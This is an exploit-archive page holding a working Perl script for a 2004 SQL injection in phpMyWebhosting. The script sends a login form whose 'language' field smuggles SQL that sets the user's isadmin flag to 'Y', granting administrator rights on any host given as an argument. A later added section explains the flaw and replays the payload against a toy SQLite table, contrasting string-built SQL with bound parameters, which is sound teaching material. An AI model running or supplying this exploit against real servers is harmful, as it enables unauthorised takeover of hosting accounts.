phpMyWebhosting SQL Injection Exploit
Source: http://www.beyondsecurity.com  Author: Noam  Published: 2004-08-18

#!/usr/bin/perl
# Exploit code by Noam Rathaus of Beyond Security Ltd.
# The following exploit code will use a valid username and password
# combination, to cause an SQL injection.
# Using the SQL injection, the Perl script elevates the privileges of the
# user provided to administrative.

use IO::Socket;
use strict;

my $Host = shift;
my $Path = shift;
my $Username = shift;
my $Password = shift;

if ($Host eq "" || $Path eq "" || $Username eq "" || $Password eq "")
{
print "You must run the script with the following syntax:\n";
print $0." hostname path username password\n";
exit(0);
}

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $Host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connected\n";

$remote->autoflush(1);

# The injection lives in the "language" field: the single quote closes the
# string value the application builds its query around, and ",isadmin='Y"
# appends a second column assignment that the application's own closing
# quote then terminates.
my $content =
  "PHP_AUTH_USER=$Username&password=$Password&language=english',isadmin='Y&login=Login";

# HTTP/1.1 request; headers are separated with CRLF and the body follows
# the blank line. Content-Length is computed from the actual form body.
my $http = "POST /$Path/index.php HTTP/1.1\r\n"
  . "Host: $Host\r\n"
  . "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506 Firefox/0.8\r\n"
  . "Connection: close\r\n"
  . "Content-Type: application/x-www-form-urlencoded\r\n"
  . "Content-Length: " . length($content) . "\r\n"
  . "\r\n"
  . $content;

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

# Echo the server's response (the angle-bracket readline operator was lost
# in the page's HTML rendering).
while (<$remote>)
{
print $_;
}
print "\n";

close $remote;
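
The payload works only because the application pastes the language field straight into its SQL. The Python below is an added illustration, not part of the original exploit or of phpMyWebhosting's code: it replays the exact form body the Perl script sends against an in-memory SQLite table (a stand-in for the target's MySQL database), once through string-built SQL and once through bound parameters. The table name, column names, the `UPDATE ... SET language=...` statement shape and the alice/secret credentials are all assumptions made from the payload alone; the page does not show the application's real query.

```python
import sqlite3
from urllib.parse import parse_qs

# Form body the Perl script POSTs, with constructed placeholder credentials
# ("alice"/"secret" are not from the original page).
EXPLOIT_BODY = (
    "PHP_AUTH_USER=alice&password=secret"
    "&language=english',isadmin='Y&login=Login"
)


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's users table (assumed schema:
    the real phpMyWebhosting table and column names are not known from the page)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (username TEXT, password TEXT, "
        "language TEXT, isadmin TEXT)"
    )
    db.execute("INSERT INTO users VALUES ('alice', 'secret', 'french', 'N')")
    db.commit()
    return db


def login_ok(db: sqlite3.Connection, username: str, password: str) -> bool:
    """The exploit needs a valid account: the update only runs after this check."""
    row = db.execute(
        "SELECT 1 FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()
    return row is not None


def vulnerable_update(db: sqlite3.Connection, username: str, language: str) -> str:
    """Assumed vulnerable pattern: the language preference is interpolated
    into the statement, so the quote and comma in the payload become SQL.
    Returns the statement that was actually executed."""
    sql = f"UPDATE users SET language='{language}' WHERE username='{username}'"
    db.execute(sql)
    db.commit()
    return sql


def safe_update(db: sqlite3.Connection, username: str, language: str) -> str:
    """Hardened form: bound parameters keep the payload as an opaque string."""
    sql = "UPDATE users SET language=? WHERE username=?"
    db.execute(sql, (language, username))
    db.commit()
    return sql


def account_state(db: sqlite3.Connection, username: str) -> dict:
    """Current language and admin flag for the account."""
    lang, admin = db.execute(
        "SELECT language, isadmin FROM users WHERE username=?", (username,)
    ).fetchone()
    return {"language": lang, "isadmin": admin}


def replay(body: str, vulnerable: bool) -> dict:
    """Decode the form body the way PHP would and apply the preference update."""
    form = parse_qs(body)
    user = form["PHP_AUTH_USER"][0]
    password = form["password"][0]
    language = form["language"][0]  # "english',isadmin='Y"
    db = fresh_db()
    if not login_ok(db, user, password):
        return {"sql": None, "language": None, "isadmin": None}
    update = vulnerable_update if vulnerable else safe_update
    sql = update(db, user, language)
    return {"sql": sql, **account_state(db, user)}


if __name__ == "__main__":
    for flag in (True, False):
        result = replay(EXPLOIT_BODY, vulnerable=flag)
        print("vulnerable" if flag else "parameterized", result)
```

In the vulnerable path the returned statement reads `UPDATE users SET language='english',isadmin='Y' WHERE username='alice'`, and the account comes back with `isadmin` set to `Y`; with bound parameters the same input is stored verbatim as the language string and the admin flag is untouched. The check a practitioner wants is the returned SQL itself: if user input can change the statement text rather than only its bound values, the injection is possible regardless of which column the attacker targets.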
